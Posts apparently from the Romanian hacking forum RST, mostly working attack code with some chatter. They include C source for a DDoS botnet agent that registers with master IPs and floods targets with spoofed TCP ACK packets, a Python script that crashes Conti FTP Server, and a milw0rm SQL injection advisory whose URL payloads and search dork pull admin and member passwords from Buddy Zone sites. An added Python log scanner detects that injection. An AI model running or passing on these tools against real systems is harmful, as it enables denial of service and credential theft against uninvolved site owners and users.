snprintf(obuf, (sizeof obuf)-1, "Caught unknown signal, This should not happen.\n"); } for (i = 0 ; i <= MAXUSERS ; i++) if ( (users[i].opts & USED) && (users[i].opts & AUTH) ) { send(users[i].fd, &obuf, strlen(obuf), 0); prompt(users[i].fd); } if (sig == SIGSEGV) exit(1); } ------------------------ server.c ------------------------ /* spwn */ char *m[]={ "1.1.1.1", /* first master */ "2.2.2.2", /* second master */ "3.3.3.3", /* third master etc */ 0 }; #define MASTER_PORT 9325 #define SERVER_PORT 7983 #include <sys/time.h> #include <strings.h> #include <stdarg.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <fcntl.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <netdb.h> #include <sys/uio.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif void forkbg (void); void send2master (char *, struct in_addr); void stream (int, int, u_long, char **); void nlstr (char *); int main (int argc, char *argv[]) { struct in_addr ia; struct sockaddr_in sock, remote; int fd, socksize, opt = 1, i; char buf[1024]; if (getuid() != 0) { fprintf(stderr, "Must be ran as root.\n"); exit(0); } if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { perror("socket"); exit(0); } sock.sin_family = AF_INET; sock.sin_port = htons(SERVER_PORT); sock.sin_addr.s_addr = INADDR_ANY; memset(&sock.sin_zero, 0, 8); if (bind(fd, (struct sockaddr *)&sock, sizeof(struct sockaddr)) == -1) { perror("bind"); exit(0); } if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (void *)&opt, sizeof(int)) == -1) { perror("setsockopt"); exit(0); } forkbg(); for (i = 0 ; m[i] != 0 ; i++) { ia.s_addr = inet_addr(m[i]); send2master("newserver", ia); } for ( { socksize = sizeof(struct sockaddr); memset(&buf, 0, sizeof 
buf); if (recvfrom(fd, &buf, (sizeof buf)-1, 0, (struct sockaddr *)&remote, &socksize) <= 0) continue; if (!strncmp(buf, "stream", 6)) { char *ip; int seconds; nlstr(buf); (void)strtok(buf, "/"); ip = strtok(NULL, "/"); seconds = atoi(strtok(NULL, "/")); stream(0, (seconds + time(0)), inet_addr(ip), NULL); } if (!strncmp(buf, "mstream", 7)) { char *ips, *ipps[50], *tmpip; int seconds, y = 1; nlstr(buf); (void)strtok(buf, "/"); ips = strtok(NULL, "/"); seconds = atoi(strtok(NULL, "/")); if ((tmpip = strtok(ips, ":")) == NULL) continue; ipps[0] = (char *) malloc(strlen(tmpip)+2); strncpy(ipps[0], tmpip, strlen(tmpip)+2); y = 1; while ((tmpip = strtok(NULL, ":")) != NULL) { ipps[y] = (char *)malloc(strlen(tmpip)+2); strncpy(ipps[y], tmpip, strlen(tmpip)+2); y++; } ipps[y] = NULL; stream(1, (seconds + time(0)), NULL, ipps); for (y = 0 ; ipps[y] != NULL ; y++) free(ipps[y]); } if (!strncmp(buf, "ping", 4)) { send2master("pong", remote.sin_addr); } } /* for( */ } /* main */ void send2master (char *buf, struct in_addr addr) { struct sockaddr_in sock; int fd; if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) return; sock.sin_family = AF_INET; sock.sin_port = htons(MASTER_PORT); sock.sin_addr = addr; memset(&sock.sin_zero, 0, 8); sendto(fd, buf, strlen(buf), 0, (struct sockaddr *)&sock, sizeof(struct sockaddr)); } void forkbg (void) { int pid; pid = fork(); if (pid == -1) { perror("fork"); exit(0); } if (pid > 0) { printf("Forked into background, pid %d\n", pid); exit(0); } } struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long saddr, daddr; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long 
th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct tcpopt_hdr { u_char type; /* type */ u_char len; /* length */ u_short value; /* value */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; /* struct tcpopt_hdr opt; */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; int sock; /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. 
*/ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } void stream (int t, int until, u_long dstaddr, char *dstaddrs[]) { struct timespec ts; int on = 1; if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) return; if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(int)) == -1) return; srand((time(NULL) ^ getpid()) + getppid()); memset(&packet, 0, sizeof packet); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); packet.ip.ip_len = FIX(sizeof packet); packet.ip.ip_off = 0; /* IP_DF? */ packet.ip.ip_ttl = 255; if (!t) packet.ip.ip_dst.s_addr = dstaddr; packet.tcp.th_flags = TH_ACK; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; /* 5 */ packet.tcp.th_urp = 0; packet.tcp.th_sport = rand(); packet.tcp.th_dport = rand(); if (!t) cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; if (!t) s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; while (time(0) <= until) { if (t) { int x; for (x = 0 ; dstaddrs[x] != NULL ; x++) { if (!strchr(dstaddrs[x], '.')) break; packet.ip.ip_dst.s_addr = inet_addr(dstaddrs[x]); cksum.pseudo.daddr = inet_addr(dstaddrs[x]); s_in.sin_addr.s_addr = inet_addr(dstaddrs[x]); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); ++packet.ip.ip_id; ++packet.tcp.th_sport; ++packet.tcp.th_seq; s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = 
in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof cksum); sendto(sock, &packet, sizeof packet, 0, (struct sockaddr *)&s_in, sizeof s_in); } } else { cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); ++packet.ip.ip_id; ++packet.tcp.th_sport; ++packet.tcp.th_seq; s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof cksum); sendto(sock, &packet, sizeof packet, 0, (struct sockaddr *)&s_in, sizeof s_in); } } } void nlstr (char *str) { if (str[strlen(str)-1] == '\n') str[strlen(str)-1] = '\0'; }
  12. kw3rln

    bug

    I had to lift RAS's ban from bug reports .. now he has posted 40 bugs for me, my hand hurts.. a few more days and the script will be automatic.. it will check whether the XSS is valid .. calculate the points automatically .. approve them.. and give a 1-week ban if it finds the same bug submitted again [the part I like the most]
  13. kw3rln

    website...

    put on some Mozart .. some texts about how the pigs and the chickens eat and about life in the countryside...
  14. I also recommend that you use 32-bit XP, because I didn't see much of a difference on my machine either .. and on Linux there was no big performance gain [tested on Gentoo]. A 64-bit processor, in my opinion, is good for full loads .. massive amounts of data .. perfect for servers .. I don't see its use for anything else
  15. sorry, I didn't see the previous post
  16. do you accept beer or cigarettes? 7. good luck
  17. http://www.securityfocus.com/archive/1/472346/30/0/threaded

    #Conti FTP Server v1.0 Denial of Service
    #author: 35c666
    #contact:
    #Download: http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe
    #Bug: Conti Ftp Server crashes when a large //A: string is sent, denying legitimate users access to their accounts.
    #greetz to all RST members at http://rstzone.net
    # usr/bin/python
    import socket
    import time

    buff = "//A:"
    user = "test"
    password = "test"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        conn = s.connect(("172.16.112.129",21))
        d = s.recv(1024)
        print "Server <- " + d
        time.sleep(2)
        s.send('USER %s\r\n' % user)
        print "Client -> USER " + user
        d = s.recv(1024)
        print "Server <- " + d
        time.sleep(2)
        s.send('PASS %s\r\n' % password)
        print "Client -> PASS " + password
        d = s.recv(1024)
        print "Server <- " + d
        time.sleep(2)
        s.send('LIST %s\r\n' % buff)
        print "Client -> LIST " + buff
        d = s.recv(1024)
        print d
        time.sleep(2)
    except:
        print "- Nu m-am putut conecta."

    who is this?
  18. flama, that's how it starts at my place too sometimes .. they wake me up in the morning.. I don't let them fall asleep in the evening ... rock/hardcore ...
  19. --==+================================================================================+==--
    --==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==--
    --==+================================================================================+==--

    AUTHOR: t0pP8uZz & xprog
    SITE: http://www.vastal.com/buddy-zone-social-networking-script.html
    DORK: allintext:"Powered By Buddy Zone"

    DESCRIPTION: Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.

    EXPLOITS:
    http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*
    http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*

    Tip/Note: The Administrator's Panel is in /admin/.

    GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps !

    --==+================================================================================+==--
    --==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==--
    --==+================================================================================+==--

    # milw0rm.com [2007-06-29]
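
A log-side check for the injection pattern in the Buddy Zone advisory above, as an added example that is not part of the original post: it URL-decodes the `cat_id` value, strips the `/**/` comment padding used in place of spaces, and flags anything that is not a plain integer id. The log lines, the `search.php` path and the assumption that `cat_id` is always a non-negative integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jun/2007:10:00:01 +0000] "GET /view_sub_cat.php?cat_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Jun/2007:10:00:07 +0000] "GET /view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4/**/FROM/**/members/* HTTP/1.1" 200 734',
    '198.51.100.23 - - [29/Jun/2007:10:01:12 +0000] "GET /view_sub_cat.php?cat_id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FSeLeCt%201,2,3,4 HTTP/1.1" 200 734',
    '203.0.113.5 - - [29/Jun/2007:10:02:30 +0000] "GET /view_sub_cat.php?cat_id=abc HTTP/1.1" 200 210',
    '203.0.113.5 - - [29/Jun/2007:10:03:02 +0000] "GET /search.php?q=union+select+committee HTTP/1.1" 200 900',
]

# Assumption: parameters the application only ever uses as non-negative integer ids.
INT_PARAMS = {"cat_id"}

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Closed /* ... */ comments, plus an unterminated trailing /* as used to cut off the query.
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)


def normalise(value):
    """Turn SQL comments into spaces and collapse whitespace, so that
    UNION/**/SELECT and UNION%20SELECT look the same to the matcher."""
    return re.sub(r"\s+", " ", SQL_COMMENT_RE.sub(" ", value)).strip()


def classify(line):
    """Return (client, parameter, verdict) tuples for one access-log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    client, target = m.groups()
    findings = []
    # parse_qsl percent-decodes each value before we inspect it.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in INT_PARAMS or re.fullmatch(r"\d+", value):
            continue  # free-text parameters and well-formed ids are not flagged
        verdict = "union-select" if UNION_RE.search(normalise(value)) else "non-integer"
        findings.append((client, name, verdict))
    return findings


def scan(lines):
    return [finding for line in lines for finding in classify(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Scoping the check to id parameters keeps the free-text search request from being flagged, while the mixed-case, percent-encoded variant is still caught.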
  20. Nice! Tutorial posted! http://rstzone.net/index.php?pagina=tutoriale&selecteaza=tutorial&id=34 or txt: http://rstzone.net/tutorialtxt.php?id=34
  21. at first it was very good! now I don't know what's up with it anymore
  22. be quiet, guys, and leave the man alone, he only just joined the forum and you're attacking him! he'll learn the rules! welcome to RST ... thanks for the program